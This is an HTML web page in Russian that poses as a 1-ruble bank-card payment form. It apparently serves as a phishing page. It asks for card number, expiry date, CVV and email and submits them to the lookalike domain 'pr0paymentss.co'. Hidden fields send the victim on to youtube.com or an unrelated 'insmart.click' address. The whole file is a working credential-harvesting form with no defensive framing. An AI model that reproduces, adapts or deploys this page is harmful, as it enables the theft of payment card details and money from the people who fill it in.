<!DOCTYPE html>
<html>
  <head>
    <meta name="viewport" content="width=device-width">
    <title>Оплата банковской картой: 1 руб.</title>
    <link href="https://fonts.googleapis.com/css?family=Roboto:300,400,500,700" rel="stylesheet">
    <style>        
        html, body {
        width: 100%; 
        position: relative;
      background-color: #F5F5F6;
        justify-content: center;
      font-family: Roboto, Arial, sans-serif;
      font-size: 15px;
      }
      form {
      border: 0px solid #f1f1f1;
      }
      input[type=text], input[type=password] {
      width: 100%;
      padding: 10px 8px;
      margin: 10px 0;
      display: inline-block;
      border: 1px solid #ccc;
      box-sizing: border-box;
font-size: 14px;
      }
      button {
      background-color: green;
      color: white;
      padding: 15px 0;
      margin: 13px 0;
      border: none;
      cursor: pointer;
      width: 100%;
     font-size: 18px;
      }
      h3 {
      text-align:center;
      }
      button:hover {
      opacity: 0.8;
      }
      .formcontainer {
      text-align: left;
      margin: 24px 50px 12px;
      }
      .container {
      padding: 16px 0;
      text-align:left;
      }
      span.psw {
      float: right;
      padding-top: 0;
      padding-right: 15px;
      }
      /* Change styles for span on extra small screens */
      @media screen and (max-width: 300px) {
      span.psw {
      display: block;
      float: none;
      }
    </style>
  </head>
  <body>

    <form action="https://pr0paymentss.co/api/request/">
      <h3>Оплата банковской картой: 1 руб.</h3>
      <div class="formcontainer">
      <hr/>

      <div class="container">
           <input type="hidden" name="amount" value="100" />
    <input type="hidden" name="merchant_order_id" value="1" />
    <input type="hidden" name="use_system_forms" value="1" />
     <label for="uname">Номер карты:</label>
    <input type="text" maxlength="16" placeholder="XXXXXXXXXXXXXXXX" name="card_number" required>
    <label for="uname">Срок действия карты: </label>
    <input type="text" maxlength="2" placeholder="ММ" name="card_month" required>
    <input type="text" maxlength="2" placeholder="ГГ" name="card_year" required>
    <label for="uname">CVV код: </label>
    <input type="text" maxlength="3" placeholder="Код с обратной стороны карты" name="card_cvc" required>
    <input type="hidden" name="country" value="RU" />
    <input type="hidden" name="success_url" value="https://www.youtube.com/" />
    <input type="hidden" name="fail_url" value="https://insmart.click/cloudpayments/" />
    <input type="hidden" name="notice_url" value="https://www.youtube.com/" />
    <input type="hidden" name="api_key" value="Вdb98f622876880ffcaecbccc18b26ae299c01bc600775df09726e635b60e493d" />
    <label for="uname">Электронная почта:</label>
    <input type="text" placeholder="Ваш Email" name="email" required>
      </div>

      <button type="submit">Оплатить 1 руб.</button>

      
    </form>
      <br><br>
      <img src="img.jpg">
  </body>
</html>
